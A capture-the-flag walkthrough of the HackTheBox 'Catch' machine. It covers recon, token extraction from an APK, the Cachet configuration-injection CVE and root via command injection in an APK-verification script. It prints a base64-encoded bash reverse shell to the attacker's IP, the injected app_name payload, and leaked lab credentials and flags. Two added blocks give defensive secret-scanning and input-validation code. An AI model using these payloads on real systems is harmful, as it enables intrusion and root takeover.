Hackthebox - Catch

Box Info

Box Type

Information Gathering

NMAP

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.150
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-06 03:34 EDT
Nmap scan report for 10.10.11.150
Host is up (0.25s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Catch Global Systems
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: i_like_gitea=229c01ff2c679664; Path=/; HttpOnly
|     Set-Cookie: _csrf=VFIu8a5yLSGnb8AWF33ofFOqRKE6MTY0OTIzMDUyNDYwMDczNjU5MQ; Path=/; Expires=Thu, 07 Apr 2022 07:35:24 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 06 Apr 2022 07:35:24 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Catch Repositories </title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcyIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Set-Cookie: i_like_gitea=ada0631c19902f31; Path=/; HttpOnly
|     Set-Cookie: _csrf=Fjvxg_M7Bc_5OS6o7uXWAaUEJCg6MTY0OTIzMDUzMzM1MTAzMTUxNg; Path=/; Expires=Thu, 07 Apr 2022 07:35:33 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 06 Apr 2022 07:35:33 GMT
|_    Content-Length: 0
5000/tcp open  upnp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, RTSPRequest, SMBProgNeg, ZendJavaBridge: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 302 Found
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Content-Security-Policy: 
|     X-Content-Security-Policy: 
|     X-WebKit-CSP: 
|     X-UA-Compatible: IE=Edge,chrome=1
|     Location: /login
|     Vary: Accept, Accept-Encoding
|     Content-Type: text/plain; charset=utf-8
|     Content-Length: 28
|     Set-Cookie: connect.sid=s%3AEQngskGgO4I2xPH7SOxj7INNlQZTOA-7.bWQDiu%2BFXvDOHdHW15rgWh4N9jvQ7KAvrpzZQrh4Vvw; Path=/; HttpOnly
|     Date: Wed, 06 Apr 2022 07:35:28 GMT
|     Connection: close
|     Found. Redirecting to /login
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Content-Security-Policy: 
|     X-Content-Security-Policy: 
|     X-WebKit-CSP: 
|     X-UA-Compatible: IE=Edge,chrome=1
|     Allow: GET,HEAD
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 8
|     ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
|     Set-Cookie: connect.sid=s%3A-1OGMg8iZf45c1yBQ3QmeijWzg-5hyZy.5H0gXM7aorV%2BeFuutbDUJQn149ThPRcg%2FiKj%2FeVanl0; Path=/; HttpOnly
|     Vary: Accept-Encoding
|     Date: Wed, 06 Apr 2022 07:35:31 GMT
|     Connection: close
|_    GET,HEAD
8000/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Catch Global Systems
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   276.00 ms 10.10.14.1
2   276.19 ms 10.10.11.150

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.41 seconds

HTTP

Port 80

After opening the site, nothing on any page is clickable except the APK download.

Next I fuzzed it and found nothing either, so let's download the APK file first and look at the other content in the meantime.

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.11.150/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.150/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

javascript              [Status: 301, Size: 317, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
                        [Status: 200, Size: 6163, Words: 855, Lines: 375]
:: Progress: [20116/20116] :: Job [1/1] :: 112 req/sec :: Duration: [0:02:39] :: Errors: 0 ::

Nothing there.

Port 5000

Port 5000 is a login page, but we don't seem to have an account.

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.11.150:5000/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.150:5000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

logout                  [Status: 302, Size: 28, Words: 4, Lines: 1]
media                   [Status: 301, Size: 177, Words: 7, Lines: 11]
login                   [Status: 200, Size: 2622, Words: 709, Lines: 57]
files                   [Status: 401, Size: 12, Words: 1, Lines: 1]
users                   [Status: 401, Size: 12, Words: 1, Lines: 1]
account                 [Status: 401, Size: 12, Words: 1, Lines: 1]
Login                   [Status: 200, Size: 2622, Words: 709, Lines: 57]
Connections             [Status: 401, Size: 12, Words: 1, Lines: 1]
connections             [Status: 401, Size: 12, Words: 1, Lines: 1]
Files                   [Status: 401, Size: 12, Words: 1, Lines: 1]
messages                [Status: 401, Size: 12, Words: 1, Lines: 1]
Account                 [Status: 401, Size: 12, Words: 1, Lines: 1]
Media                   [Status: 301, Size: 177, Words: 7, Lines: 11]
Users                   [Status: 401, Size: 12, Words: 1, Lines: 1]
FILES                   [Status: 401, Size: 12, Words: 1, Lines: 1]
Logout                  [Status: 302, Size: 28, Words: 4, Lines: 1]
Messages                [Status: 401, Size: 12, Words: 1, Lines: 1]
                        [Status: 302, Size: 28, Words: 4, Lines: 1]
rooms                   [Status: 401, Size: 12, Words: 1, Lines: 1]
MEDIA                   [Status: 301, Size: 177, Words: 7, Lines: 11]
CONNECTIONS             [Status: 401, Size: 12, Words: 1, Lines: 1]
LOGIN                   [Status: 200, Size: 2627, Words: 709, Lines: 57]
:: Progress: [20116/20116] :: Job [1/1] :: 77 req/sec :: Duration: [0:05:20] :: Errors: 0 ::

Quite a lot here; let's take a look.

It responds with Unauthorized: no token, since we aren't logged in.

Port 8000

It looks like a system status monitor; clicking the dashboard at the bottom leads to a login page.

I tried a few weak passwords without success, so let's look at the APK file.

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.11.150:8000/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.150:8000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

admin                   [Status: 302, Size: 386, Words: 60, Lines: 12]
img                     [Status: 301, Size: 317, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 319, Words: 20, Lines: 10]
setup                   [Status: 302, Size: 382, Words: 60, Lines: 12]
dashboard               [Status: 302, Size: 386, Words: 60, Lines: 12]
storage                 [Status: 403, Size: 279, Words: 20, Lines: 10]
dist                    [Status: 301, Size: 318, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10]
                        [Status: 200, Size: 8870, Words: 1951, Lines: 302]
:: Progress: [20116/20116] :: Job [1/1] :: 70 req/sec :: Duration: [0:05:55] :: Errors: 0 ::

Nothing worth looking at here either.

APK

Decompile it with apktool

┌──(root💀kali)-[~/Desktop/catch]
└─# apktool d catchv1.0.apk 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I: Using Apktool 2.5.0-dirty on catchv1.0.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

Then search for tokens

┌──(root💀kali)-[~/Desktop/catch]
└─# grep -rn token catchv1.0/res/values/strings.xml
43:    <string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
47:    <string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
104:    <string name="slack_token">xoxp-23984754863-2348975623103</string>

Line 47 of catchv1.0/res/values/strings.xml holds a lets_chat_token; that should be the one, so let's use it.
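
As an added example (not from the original writeup), the manual grep above generalized into a small check: given a decompiled strings.xml, it flags resource names that suggest a credential and values shaped like tokens (Slack xox* tokens, long hex, base64 blobs), decoding base64 values that turn out to be readable text. It assumes GNU grep and coreutils base64; the strings.xml it scans is constructed with placeholder values.

```shell
# Hardcoded-secret check for a decoded APK's res/values/strings.xml.
# Added example, not part of the original writeup. Anything it finds is
# recoverable by anyone who downloads the APK, so such values belong
# server-side or must be issued per user at runtime.

# Classify one string resource ($1 = name, $2 = value); prints the reason
# or nothing when the resource looks harmless.
classify() {
    case "$1" in
        *[Tt]oken*|*[Ss]ecret*|*[Pp]assw*|*[Aa]pi*[Kk]ey*) echo credential-name; return 0 ;;
    esac
    if   printf '%s' "$2" | LC_ALL=C grep -Eq '^xox[abeoprs]-'; then echo slack-token
    elif printf '%s' "$2" | LC_ALL=C grep -Eq '^[0-9a-f]{32,}$'; then echo hex-secret
    elif printf '%s' "$2" | LC_ALL=C grep -Eq '^[A-Za-z0-9+/]{32,}={0,2}$'; then echo base64-blob
    fi
}

# Decode a base64 value and print it only if the result is printable text.
decode_if_text() {
    out=$(printf '%s' "$1" | base64 -d 2>/dev/null) || return 1
    printf '%s' "$out" | LC_ALL=C grep -Eq '^[[:print:]]+$' || return 1
    printf '%s\n' "$out"
}

# Print one finding per line: "<reason> <name>=<value>[ decoded=<text>]".
scan_strings_xml() {
    grep -o '<string name="[^"]*">[^<]*' "$1" | while read -r entry; do
        name=${entry#*\"}; name=${name%%\"*}
        value=${entry#*>}
        reason=$(classify "$name" "$value")
        if [ -n "$reason" ]; then
            line="$reason $name=$value"
            decoded=$(decode_if_text "$value") && line="$line decoded=$decoded"
            printf '%s\n' "$line"
        fi
    done
}

# Constructed sample strings.xml in the layout of the one decompiled above,
# with placeholder values (the base64 one is built here); prints the file path.
make_sample_strings_xml() {
    f=$(mktemp)
    b64=$(printf '%s' 'demo-user-id-000001:demo-secret-000001' | base64 | tr -d '\n')
    cat > "$f" <<EOF
<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Catch Mobile</string>
    <string name="gitea_token">0123456789abcdef0123456789abcdef01234567</string>
    <string name="lets_chat_token">$b64</string>
    <string name="slack_token">xoxp-CONSTRUCTED-0000000000</string>
    <string name="welcome">Welcome back</string>
</resources>
EOF
    printf '%s\n' "$f"
}
```

Run it as `scan_strings_xml catchv1.0/res/values/strings.xml` against a real decompiled APK; each finding is one line, so the output feeds a CI gate easily.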

Exploitation

Read the API using the token as the Authorization header

┌──(root💀kali)-[~/Desktop]
└─# curl -H 'Authorization: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==' 'http://10.10.11.150:5000/rooms'
[{"id":"61b86b28d984e2451036eb17","slug":"status","name":"Status","description":"Cachet Updates and Maintenance","lastActive":"2021-12-14T10:34:20.749Z","created":"2021-12-14T10:00:08.384Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]},{"id":"61b8708efe190b466d476bfb","slug":"android_dev","name":"Android Development","description":"Android App Updates, Issues & More","lastActive":"2021-12-14T10:24:21.145Z","created":"2021-12-14T10:23:10.474Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]},{"id":"61b86b3fd984e2451036eb18","slug":"employees","name":"Employees","description":"New Joinees, Org updates","lastActive":"2021-12-14T10:18:04.710Z","created":"2021-12-14T10:00:31.043Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]}]

Next, read the contents of a room

┌──(root💀kali)-[~/Desktop]
└─# curl -H 'Authorization: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==' 'http://10.10.11.150:5000/rooms/61b86b28d984e2451036eb17/messages'
[{"id":"61b8732cfe190b466d476c02","text":"ah sure!","posted":"2021-12-14T10:34:20.749Z","owner":"61b86dbdfe190b466d476bf0","room":"61b86b28d984e2451036eb17"},{"id":"61b8731ffe190b466d476c01","text":"You should actually include this task to your list as well as a part of quarterly audit","posted":"2021-12-14T10:34:07.449Z","owner":"61b86aead984e2451036eb16","room":"61b86b28d984e2451036eb17"},{"id":"61b872b9fe190b466d476c00","text":"Also make sure we've our systems, applications and databases up-to-date.","posted":"2021-12-14T10:32:25.514Z","owner":"61b86dbdfe190b466d476bf0","room":"61b86b28d984e2451036eb17"},{"id":"61b87282fe190b466d476bff","text":"Excellent! ","posted":"2021-12-14T10:31:30.403Z","owner":"61b86aead984e2451036eb16","room":"61b86b28d984e2451036eb17"},{"id":"61b87277fe190b466d476bfe","text":"Why not. We've this in our todo list for next quarter","posted":"2021-12-14T10:31:19.094Z","owner":"61b86dbdfe190b466d476bf0","room":"61b86b28d984e2451036eb17"},{"id":"61b87241fe190b466d476bfd","text":"@john is it possible to add SSL to our status domain to make sure everything is secure ? ","posted":"2021-12-14T10:30:25.108Z","owner":"61b86aead984e2451036eb16","room":"61b86b28d984e2451036eb17"},{"id":"61b8702dfe190b466d476bfa","text":"Here are the credentials `john :  E}V!mywu_69T4C}W`","posted":"2021-12-14T10:21:33.859Z","owner":"61b86f15fe190b466d476bf5","room":"61b86b28d984e2451036eb17"},{"id":"61b87010fe190b466d476bf9","text":"Sure one sec.","posted":"2021-12-14T10:21:04.635Z","owner":"61b86f15fe190b466d476bf5","room":"61b86b28d984e2451036eb17"},{"id":"61b86fb1fe190b466d476bf8","text":"Can you create an account for me ? ","posted":"2021-12-14T10:19:29.677Z","owner":"61b86dbdfe190b466d476bf0","room":"61b86b28d984e2451036eb17"},{"id":"61b86f4dfe190b466d476bf6","text":"Hey Team! I'll be handling the `status.catch.htb` from now on. Lemme know if you need anything from me. 
","posted":"2021-12-14T10:17:49.761Z","owner":"61b86f15fe190b466d476bf5","room":"61b86b28d984e2451036eb17"}]

Reading on through the messages in the room:

username = john
password = E}V!mywu_69T4C}W

A set of credentials was extracted from the content above.

Let's try logging in on port 8000 with them.

Login successful; let's look around.

We can see that this is a Cachet server, so let's search for vulnerabilities.

Found a writeup: Cachet 2.4: Code Execution via Laravel Configuration Injection (CVE-2021-39165)

https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection

According to the article, intercept the request that saves the mail settings and replace the value with the injection expression.

Change it to ${DB_USERNAME}

Change it to ${DB_PASSWORD}

username = will
password = s2#4Fg0_%3!

We obtained a set of credentials; let's log in over SSH.

┌──(root💀kali)-[~/Desktop]
└─# ssh will@10.10.11.150
will@10.10.11.150's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-104-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 06 Apr 2022 08:41:02 AM UTC

  System load:                      0.19
  Usage of /:                       75.6% of 16.61GB
  Memory usage:                     83%
  Swap usage:                       33%
  Processes:                        448
  Users logged in:                  0
  IPv4 address for br-535b7cf3a728: 172.18.0.1
  IPv4 address for br-fe1b5695b604: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.150
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:ffd

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Apr  6 08:40:51 2022 from 10.10.14.9
will@catch:~$ whoami&&id
will
uid=1000(will) gid=1000(will) groups=1000(will)

Login successful.

will@catch:~$ ls
user.txt
will@catch:~$ cat user.txt 
24b48fcc5b166f68a855af04633081c7

Got the user flag.

Privilege Escalation

will@catch:~$ sudo -l
[sudo] password for will: 
Sorry, user will may not run sudo on catch.

sudo -l fails, so that's not the privilege-escalation path.

Ran linpeas.sh

[+] Readable files belonging to root and readable by me but not world readable
-rwxr-x--x+ 1 root root 1894 Mar  3 14:23 /opt/mdm/verify.sh
-rw-r----- 1 root will 33 Apr  5 17:23 /home/will/user.txt

There is a /opt/mdm/verify.sh file here; let's search the process list for it.

will@catch:~$ ps auxw|grep verify.sh
will      386873  0.0  0.0   6436   656 pts/0    S+   08:59   0:00 grep --color=auto verify.sh

It turns up in the process search too; let's look at the file.

will@catch:~$ cat /opt/mdm/verify.sh
#!/bin/bash

###################
# Signature Check #
###################

sig_check() {
        jarsigner -verify "$1/$2" 2>/dev/null >/dev/null
        if [[ $? -eq 0 ]]; then
                echo '[+] Signature Check Passed'
        else
                echo '[!] Signature Check Failed. Invalid Certificate.'
                cleanup
                exit
        fi
}

#######################
# Compatibility Check #
#######################

comp_check() {
        apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null
        COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml")
        if [ -z "$COMPILE_SDK_VER" ]; then
                echo '[!] Failed to find target SDK version.'
                cleanup
                exit
        else
                if [ $COMPILE_SDK_VER -lt 18 ]; then
                        echo "[!] APK Doesn't meet the requirements"
                        cleanup
                        exit
                fi
        fi
}

####################
# Basic App Checks #
####################

app_check() {
        APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
        echo $APP_NAME
        if [[ $APP_NAME == *"Catch"* ]]; then
                echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
                mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
        else
                echo "[!] App doesn't belong to Catch Global"
                cleanup
                exit
        fi
}

###########
# Cleanup #
###########

cleanup() {
        rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh)
}

###################
# MDM CheckerV1.0 #
###################

DROPBOX=/opt/mdm/apk_bin
IN_FOLDER=/root/mdm/apk_bin
OUT_FOLDER=/root/mdm/certified_apps
PROCESS_BIN=/root/mdm/process_bin

for IN_APK_NAME in $DROPBOX/*.apk;do
        OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk"
        APK_NAME="$(openssl rand -hex 12).apk"
        if [[ -L "$IN_APK_NAME" ]]; then
                exit
        else
                mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME"
        fi
        sig_check $IN_FOLDER $APK_NAME
        comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN
        app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME
done
cleanup

The app_check() function here is flawed.

It reads APP_NAME from the APK's res/values/strings.xml and then feeds it unquoted through xargs into `sh -c 'mkdir {}'`, so whatever the app name contains is interpreted by the shell.

We can exploit this for command injection.
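
For contrast, an added example (not the box's script) of how app_check() should have handled the name: validate it against an allow-list and hand it to mkdir as a plain argument instead of through `sh -c`. It assumes $1 is the decoded strings.xml and $2 the output directory; the two strings.xml inputs it uses are constructed.

```shell
# Hardened version of the app_name handling in verify.sh's app_check().
# Added example, not the box's own script. Assumes $1 is the decoded
# res/values/strings.xml and $2 the output directory.
# Two changes defuse the injection: the name must match a strict allow-list,
# and mkdir receives it as an argument after "--", never as text interpolated
# into `sh -c`, so a name like "Catch|<cmd>" can no longer execute <cmd>.

# Print the first app_name string resource (empty if absent).
extract_app_name() {
    sed -n 's/.*<string name="app_name">\([^<]*\)<\/string>.*/\1/p' "$1" | head -n 1
}

# Accept only letters, digits, space, dot, underscore and hyphen; 1..64 chars.
# Pipes, semicolons, backticks, "$(" and quotes all fail this check.
valid_app_name() {
    printf '%s' "$1" | LC_ALL=C grep -Eq '^[A-Za-z0-9._ -]{1,64}$'
}

# Returns 0 and creates "$2/<name>" when the name is safe and contains "Catch";
# returns 1 and creates nothing otherwise.
app_check_safe() {
    name=$(extract_app_name "$1")
    [ -n "$name" ] || { echo '[!] app_name not found' >&2; return 1; }
    valid_app_name "$name" || { echo '[!] Rejected unsafe app_name' >&2; return 1; }
    case "$name" in
        *Catch*) ;;
        *) echo "[!] App doesn't belong to Catch Global" >&2; return 1 ;;
    esac
    mkdir -p -- "$2/$name"
}

# Constructed sample inputs: a benign strings.xml and one carrying a crafted
# name of the kind shown above. Writes both to a temp dir and prints its path.
make_samples() {
    dir=$(mktemp -d)
    printf '<resources>\n    <string name="app_name">Catch Mobile</string>\n</resources>\n' > "$dir/good.xml"
    printf '<resources>\n    <string name="app_name">Catch|echo injected</string>\n</resources>\n' > "$dir/bad.xml"
    printf '%s\n' "$dir"
}
```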

┌──(root💀kali)-[~/Desktop]
└─# echo '/bin/bash -i >& /dev/tcp/10.10.14.9/4444 0>&1'|base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkvNDQ0NCAwPiYxCg==

┌──(root💀kali)-[~/Desktop]
└─# echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkvNDQ0NCAwPiYxCg==|base64 -d
/bin/bash -i >& /dev/tcp/10.10.14.9/4444 0>&1

Then write the payload

<string name="app_name">Catch|echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkvNDQ0NCAwPiYxCg== | base64 -d | bash</string>

Then replace the app_name line (line 30 of res/values/strings.xml) with the payload above.

Next, listen on a port with nc -nvlp

nc -nvlp 4444

Then rebuild the app with the latest apktool, version 2.6.1 from GitHub

┌──(root💀kali)-[~/Desktop/catch]
└─# java -jar apktool_2.6.1.jar b -f -d catchv1.0 -o catchv2.0.apk
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I: Using Apktool 2.6.1
I: Smaling smali folder into classes.dex...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...

┌──(root💀kali)-[~/Desktop/catch]
└─# ls
apktool_2.6.1.jar  catchv1.0  catchv1.0.apk  catchv2.0.apk

Then sign the APK and verify the signature

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore catchv2.0.apk alias_name

jarsigner -verify -verbose -certs catchv2.0.apk

┌──(root💀kali)-[~/Desktop/catch]
└─# keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
输入密钥库口令:  
再次输入新口令: 
您的名字与姓氏是什么?
  [Unknown]:  
您的组织单位名称是什么?
  [Unknown]:  
您的组织名称是什么?
  [Unknown]:  
您所在的城市或区域名称是什么?
  [Unknown]:  
您所在的省/市/自治区名称是什么?
  [Unknown]:  
该单位的双字母国家/地区代码是什么?
  [Unknown]:  
CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown是否正确?
  [否]:  y

正在为以下对象生成 2,048 位RSA密钥对和自签名证书 (SHA256withRSA) (有效期为 10,000 天):
         CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
[正在存储my-release-key.keystore]

┌──(root💀kali)-[~/Desktop/catch]
└─# ls my-release-key.keystore 
my-release-key.keystore

That generated a keystore; the verification output is long, so I won't paste it here. Verify it yourself.

Start an HTTP server with python3 -m http.server

┌──(root💀kali)-[~/Desktop/catch]
└─# python3 -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Then download the APK with wget

will@catch:~$ wget http://10.10.14.9/catchv2.0.apk
--2022-04-06 09:28:38--  http://10.10.14.9/catchv2.0.apk
Connecting to 10.10.14.9:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2821343 (2.7M) [application/vnd.android.package-archive]
Saving to: ‘catchv2.0.apk’

catchv2.0.apk                       100%[=================================================================>]   2.69M   869KB/s    in 3.2s    

2022-04-06 09:28:42 (869 KB/s) - ‘catchv2.0.apk’ saved [2821343/2821343]

Then put the downloaded APK into the /opt/mdm/apk_bin folder

will@catch:~$ cp catchv2.0.apk /opt/mdm/apk_bin
will@catch:~$ ls /opt/mdm/apk_bin
catchv2.0.apk

┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444                                       
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.150] 34410
bash: cannot set terminal process group (397832): Inappropriate ioctl for device
bash: no job control in this shell
root@catch:~# whoami&&id
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

After waiting a moment, we get a root shell.

root@catch:~# cd /root
cd /root
root@catch:~# cat root.txt
cat root.txt
36160af074e848d9139b7d14c9c4e5ca

Got the root flag.